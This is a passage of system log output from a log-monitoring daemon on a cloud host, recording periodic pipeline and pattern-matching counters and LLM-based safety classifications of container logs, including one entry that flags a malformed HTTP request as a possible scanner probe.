ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:01.939841 [observer] Pipeline: processed=4352 pattern_hits=4255 llm_calls=97 llm_errors=1 learned=3 Mar 20 10:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:01.939881 [observer] Patterns: hash=4255 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=97 Mar 20 10:47:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:17.069395 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 10:47:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:17.069439 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 20 10:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:31.943605 [observer] Pipeline: processed=4355 pattern_hits=4257 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:47:31.943635 [observer] Patterns: hash=4257 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98 Mar 20 10:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:01.952327 [observer] Pipeline: processed=4357 pattern_hits=4259 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:01.952351 [observer] Patterns: hash=4259 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98 Mar 20 10:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:31.934123 [observer] Pipeline: processed=4361 pattern_hits=4263 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:48:31.934147 [observer] Patterns: hash=4263 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98 Mar 20 10:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:01.951419 [observer] Pipeline: processed=4365 pattern_hits=4267 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:01.951455 [observer] 
Patterns: hash=4267 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98 Mar 20 10:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:31.938415 [observer] Pipeline: processed=4369 pattern_hits=4271 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:49:31.938452 [observer] Patterns: hash=4271 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98 Mar 20 10:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:01.950502 [observer] Pipeline: processed=4371 pattern_hits=4273 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:01.950542 [observer] Patterns: hash=4273 prefix=0 regex=0 contains=0 deny=21 alert=301 suppress=0 misses=98 Mar 20 10:50:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:10.795487 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T10:50:10.795212701Z 43.165.189.206 - - [20/Mar/2026:10:50:10 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.1... 
Mar 20 10:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:31.935385 [observer] Pipeline: processed=4376 pattern_hits=4278 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:50:31.935413 [observer] Patterns: hash=4278 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:01.948131 [observer] Pipeline: processed=4378 pattern_hits=4280 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:01.948168 [observer] Patterns: hash=4280 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:31.940025 [observer] Pipeline: processed=4380 pattern_hits=4282 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:51:31.940060 [observer] Patterns: hash=4282 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:01.961643 [observer] Pipeline: processed=4384 pattern_hits=4286 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:01.961676 [observer] Patterns: hash=4286 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:31.935289 [observer] Pipeline: processed=4386 pattern_hits=4288 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:52:31.935314 [observer] Patterns: hash=4288 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:01.952221 [observer] Pipeline: processed=4390 pattern_hits=4292 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:01.952249 [observer] Patterns: 
hash=4292 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:31.944961 [observer] Pipeline: processed=4392 pattern_hits=4294 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:53:31.944990 [observer] Patterns: hash=4294 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:01.938653 [observer] Pipeline: processed=4398 pattern_hits=4300 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:01.938682 [observer] Patterns: hash=4300 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:31.941589 [observer] Pipeline: processed=4400 pattern_hits=4302 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:54:31.941623 [observer] Patterns: hash=4302 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:01.957488 [observer] Pipeline: processed=4402 pattern_hits=4304 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:01.958228 [observer] Patterns: hash=4304 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:31.938339 [observer] Pipeline: processed=4406 pattern_hits=4308 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:55:31.938389 [observer] Patterns: hash=4308 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:01.949474 [observer] Pipeline: processed=4408 pattern_hits=4310 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:56:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:01.949503 [observer] Patterns: hash=4310 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:31.934223 [observer] Pipeline: processed=4412 pattern_hits=4314 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:56:31.934247 [observer] Patterns: hash=4314 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:01.952715 [observer] Pipeline: processed=4414 pattern_hits=4316 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:01.952749 [observer] Patterns: hash=4316 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:31.934373 [observer] Pipeline: processed=4418 pattern_hits=4320 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:31.934407 [observer] Patterns: hash=4320 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:01.942117 [observer] Pipeline: processed=4420 pattern_hits=4322 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:01.942144 [observer] Patterns: hash=4322 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:31.944720 [observer] Pipeline: processed=4422 pattern_hits=4324 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:31.944747 [observer] Patterns: hash=4324 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:01.951562 [observer] Pipeline: 
processed=4428 pattern_hits=4330 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:01.951596 [observer] Patterns: hash=4330 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 10:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:31.934477 [observer] Pipeline: processed=4430 pattern_hits=4332 llm_calls=98 llm_errors=1 learned=3 Mar 20 10:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:31.934500 [observer] Patterns: hash=4332 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:01.968767 [observer] Pipeline: processed=4434 pattern_hits=4336 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:01.972359 [observer] Patterns: hash=4336 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:31.935561 [observer] Pipeline: processed=4436 pattern_hits=4338 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:31.935594 [observer] Patterns: hash=4338 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:01.942250 [observer] Pipeline: processed=4440 pattern_hits=4342 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:01.942370 [observer] Patterns: hash=4342 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:31.943318 [observer] Pipeline: processed=4442 pattern_hits=4344 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:31.943343 [observer] Patterns: hash=4344 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:02:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:01.946409 [observer] Pipeline: processed=4444 pattern_hits=4346 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:01.946442 [observer] Patterns: hash=4346 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:31.935520 [observer] Pipeline: processed=4448 pattern_hits=4350 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:31.935551 [observer] Patterns: hash=4350 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:01.946716 [observer] Pipeline: processed=4450 pattern_hits=4352 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:01.946747 [observer] Patterns: hash=4352 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:31.934944 [observer] Pipeline: processed=4454 pattern_hits=4356 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:31.934970 [observer] Patterns: hash=4356 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:01.964487 [observer] Pipeline: processed=4458 pattern_hits=4360 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:01.964518 [observer] Patterns: hash=4360 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:31.935344 [observer] Pipeline: processed=4462 pattern_hits=4364 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:31.935376 [observer] Patterns: hash=4364 
prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:01.989932 [observer] Pipeline: processed=4464 pattern_hits=4366 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:01.990089 [observer] Patterns: hash=4366 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:31.940312 [observer] Pipeline: processed=4466 pattern_hits=4368 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:31.940343 [observer] Patterns: hash=4368 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:01.996129 [observer] Pipeline: processed=4470 pattern_hits=4372 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:01.996313 [observer] Patterns: hash=4372 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:31.943644 [observer] Pipeline: processed=4472 pattern_hits=4374 llm_calls=98 llm_errors=1 learned=3 Mar 20 11:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:31.943668 [observer] Patterns: hash=4374 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98 Mar 20 11:06:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:55.935073 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 11:06:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:55.935109 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 11:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:01.962740 [observer] Pipeline: processed=4478 pattern_hits=4378 llm_calls=100 llm_errors=1 learned=3 Mar 20 11:07:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:01.962770 [observer] Patterns: hash=4378 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=100 Mar 20 11:07:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:04.230431 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 11:07:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:04.230476 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 20 11:07:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:10.340650 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 20 11:07:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:10.340711 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+) Mar 20 11:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:31.934531 [observer] Pipeline: processed=4481 pattern_hits=4380 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:31.934556 [observer] Patterns: hash=4380 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:01.963376 [observer] Pipeline: processed=4485 pattern_hits=4384 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:01.963407 [observer] Patterns: hash=4384 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:31.934291 [observer] Pipeline: processed=4487 pattern_hits=4386 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:31.934314 [observer] Patterns: hash=4386 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:01.945868 
[observer] Pipeline: processed=4491 pattern_hits=4390 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:01.945903 [observer] Patterns: hash=4390 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:31.934308 [observer] Pipeline: processed=4495 pattern_hits=4394 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:31.934332 [observer] Patterns: hash=4394 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:01.953510 [observer] Pipeline: processed=4497 pattern_hits=4396 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:01.953545 [observer] Patterns: hash=4396 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:31.934572 [observer] Pipeline: processed=4501 pattern_hits=4400 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:31.934594 [observer] Patterns: hash=4400 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:01.948851 [observer] Pipeline: processed=4503 pattern_hits=4402 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:01.948883 [observer] Patterns: hash=4402 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:31.935286 [observer] Pipeline: processed=4507 pattern_hits=4406 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:31.935310 [observer] Patterns: hash=4406 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 
misses=101 Mar 20 11:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:01.945190 [observer] Pipeline: processed=4509 pattern_hits=4408 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:01.945457 [observer] Patterns: hash=4408 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:31.952486 [observer] Pipeline: processed=4511 pattern_hits=4410 llm_calls=101 llm_errors=1 learned=3 Mar 20 11:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:31.952511 [observer] Patterns: hash=4410 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101 Mar 20 11:13:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:00.871482 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 11:13:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:00.871520 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 20 11:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:02.041217 [observer] Pipeline: processed=4517 pattern_hits=4414 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:02.042397 [observer] Patterns: hash=4414 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:13:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:03.257686 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.85 action=allow pattern_type=prefix Mar 20 11:13:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:03.257740 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 11:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:31.944468 [observer] Pipeline: processed=4519 pattern_hits=4416 
llm_calls=103 llm_errors=1 learned=3 Mar 20 11:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:31.944491 [observer] Patterns: hash=4416 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:01.945312 [observer] Pipeline: processed=4523 pattern_hits=4420 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:01.945336 [observer] Patterns: hash=4420 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:31.944839 [observer] Pipeline: processed=4527 pattern_hits=4424 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:31.944894 [observer] Patterns: hash=4424 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:01.951502 [observer] Pipeline: processed=4531 pattern_hits=4428 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:01.951534 [observer] Patterns: hash=4428 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:31.944390 [observer] Pipeline: processed=4533 pattern_hits=4430 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:31.944420 [observer] Patterns: hash=4430 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:01.972045 [observer] Pipeline: processed=4535 pattern_hits=4432 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:01.972104 [observer] Patterns: hash=4432 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:16:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 11:16:31.936453 [observer] Pipeline: processed=4539 pattern_hits=4436 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:31.936475 [observer] Patterns: hash=4436 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:01.942532 [observer] Pipeline: processed=4541 pattern_hits=4438 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:01.942565 [observer] Patterns: hash=4438 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:31.935884 [observer] Pipeline: processed=4545 pattern_hits=4442 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:31.935914 [observer] Patterns: hash=4442 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:01.954341 [observer] Pipeline: processed=4547 pattern_hits=4444 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:01.954363 [observer] Patterns: hash=4444 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:31.935706 [observer] Pipeline: processed=4551 pattern_hits=4448 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:31.935736 [observer] Patterns: hash=4448 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:01.967791 [observer] Pipeline: processed=4553 pattern_hits=4450 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:01.967820 [observer] Patterns: hash=4450 prefix=0 
regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:31.949628 [observer] Pipeline: processed=4557 pattern_hits=4454 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:31.949652 [observer] Patterns: hash=4454 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:01.944190 [observer] Pipeline: processed=4561 pattern_hits=4458 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:01.944217 [observer] Patterns: hash=4458 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:31.944675 [observer] Pipeline: processed=4563 pattern_hits=4460 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:31.944704 [observer] Patterns: hash=4460 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:01.976005 [observer] Pipeline: processed=4567 pattern_hits=4464 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:01.976042 [observer] Patterns: hash=4464 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:31.943809 [observer] Pipeline: processed=4569 pattern_hits=4466 llm_calls=103 